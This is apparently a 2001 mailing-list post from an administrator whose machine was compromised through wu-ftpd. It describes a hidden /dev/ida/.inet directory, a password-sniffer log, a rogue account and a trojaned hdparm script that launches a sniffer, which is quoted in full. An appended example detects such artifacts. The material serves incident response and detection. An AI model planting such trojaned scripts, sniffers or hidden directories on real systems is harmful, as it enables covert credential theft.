ftp was hacked
From: R.A.Wilson (bud@styx.darbonne.com) Date: 12/28/01
- Next message: Ian Jones: "Re: ftp was hacked"
- Previous message: Kasper Dupont: "Re: small linux firewall/router advice"
- Next in thread: routed: "Re: ftp was hacked"
- Reply:(deleted message) routed: "Re: ftp was hacked"
- Reply: Ian Jones: "Re: ftp was hacked"
- Reply: gax: "Re: ftp was hacked"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 28 Dec 2001 16:18:40 +0000 From: "R.A.Wilson" <bud@styx.darbonne.com>
Hi -
I have some info to pass along, and a question...
A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
a sniffer and a port scanner on my machine. I use slackware, 2.2.16
The only reason I found out is that a sharp Linux administrator noted
port scans coming from my machine and wanted to know what was going on.
I looked like the bad guy.
After a lot of work, I found the intruder had made a directory where
he put his sniffer log and other programs. He had them set up in:
/dev/ida/.inet
I don't believe that's a legitimate directory.
When I looked at a file called tcp.log, in that directory, I was
stunned to see he had plain text passwords of all the users on my
machine. I couldn't pull the plug fast enough!
He also had managed to put an illegal account in /etc/passwd. He used
the account name www. I found files belonging to www and rm'd them.
I also took him out of the passwd file. I updated wu-ftp to the latest
version of 2.6.2 and thought that solved the problem.
A few days later I wanted to install a later version of hdparm. I was
using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
two of them: one in /usr/bin/hdparm and the other in /usr/sbin/hdparm.
Which was correct? I did 'which hdparm' and found the one in /usr/sbin
was it. It was also a binary file. Curious, I looked at the other one.
This is what it looked like:
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
So, just by a lucky accident I had discovered the intruder's script to
call his sniffer.
I tried to move the file. I tried to edit the file. I tried to remove
it. Nothing. Root cannot touch it! Here's the system message I get
when I try any of the above...
cannot unlink 'hdparm': Operation not permitted.
Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???
-Roy Wilson-
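A defender's check for the kind of artifacts this message describes, added here as an example and not part of the original thread. It builds a constructed sample tree with the same layout (a shell script sitting where /usr/bin/hdparm should be and cd'ing into /dev/ida/.inet, a binary hdparm in /usr/sbin) and flags hidden directories under /dev, scripts in system bin directories that reference /dev, and one command name present in two bin directories as different file kinds. The sample paths and the fake ELF header are assumptions made for the example.

```python
import os
import tempfile
from pathlib import Path

# Constructed sample tree mirroring the message: a shell script where /usr/bin/hdparm
# should be, a (fake ELF) hdparm in /usr/sbin, and the hidden /dev/ida/.inet directory.
def build_sample_tree():
    root = tempfile.mkdtemp()
    for d in ("usr/bin", "usr/sbin", "dev/ida/.inet"):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, "usr/bin/hdparm"), "w") as f:
        f.write("#!/bin/sh\ncd /dev/ida/.inet\n./sshdu -f ./s\n"
                "./linsniffer >> ./tcp.log &\ncd /\n")
    with open(os.path.join(root, "usr/sbin/hdparm"), "wb") as f:
        f.write(b"\x7fELF" + b"\x00" * 12)  # stand-in for the genuine binary
    return root

def file_kind(path):
    # 'elf' for a native binary, 'script' for a #! file, 'other' for anything else
    with open(path, "rb") as f:
        head = f.read(4)
    if head == b"\x7fELF":
        return "elf"
    return "script" if head.startswith(b"#!") else "other"

def find_suspicious(root):
    findings = []
    # A device directory has no business holding dot-directories like /dev/ida/.inet.
    for dirpath, dirnames, _ in os.walk(os.path.join(root, "dev")):
        for d in dirnames:
            if d.startswith("."):
                findings.append(("hidden-dev-dir", os.path.relpath(os.path.join(dirpath, d), root)))
    # Scripts in system bin directories that point into /dev, and one command name
    # present in two bin directories as different file kinds (the two hdparm copies).
    seen = {}
    bindirs = (os.path.join(root, b) for b in ("bin", "sbin", "usr/bin", "usr/sbin"))
    for full in filter(os.path.isdir, bindirs):
        for name in sorted(os.listdir(full)):
            path = os.path.join(full, name)
            if not os.path.isfile(path):
                continue
            kind, rel = file_kind(path), os.path.relpath(path, root)
            if kind == "script" and "/dev/" in Path(path).read_text(errors="replace"):
                findings.append(("script-refs-dev", rel))
            if name in seen and seen[name][0] != kind:
                findings.append(("duplicate-name", seen[name][1] + " vs " + rel))
            seen.setdefault(name, (kind, rel))
    return sorted(findings)
```

Root getting `cannot unlink ... Operation not permitted` is the usual symptom of the ext2 immutable attribute, which `lsattr` shows and `chattr -i` clears; that is this example's assumption about the cause, which the message itself does not state.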